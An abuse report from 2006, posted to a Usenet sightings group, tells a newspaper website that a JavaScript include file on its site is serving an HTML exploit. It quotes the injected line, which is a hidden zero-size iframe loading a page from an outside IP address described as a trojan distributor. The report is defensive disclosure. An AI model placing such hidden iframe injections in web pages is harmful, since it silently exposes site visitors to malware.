Date: Thu, 23 Feb 2006 13:27:34 -0600 (CST)
To: custome...@observer.com, postm...@observer.com
Cc: Federal Trade Commission <sp...@uce.gov>, cybercrime <cyber...@fbi.gov>
Subject: [virus]http://www.observer.com//includes/nyo.js
Your site http://www.observer.com//includes/nyo.js
is responsible for distributing the
Exploit.HTML.Mht
This code appears at the top of most (all?) stories distributed via web by this
newspaper, such as
http://www.observer.com/20060227/20060227_Bruce_Feirstein_thecity_newyorkersdiary.asp
The offending code is :
}
//-->
document.write('<iframe height=0 width=0
src="http://210.118.120.49/HitCount/Top.Htm"></iframe>');
at the bottom, which connects back to a trojan distributer in Korea.
--
All postings to news.admin.net-abuse.sightings are unconfirmed and
unverified unless stated otherwise by the moderators. All opinions
expressed above are considered the opinions of the original poster,
not the moderators or their respective employers.
For a copy of the guidelines to this group, see: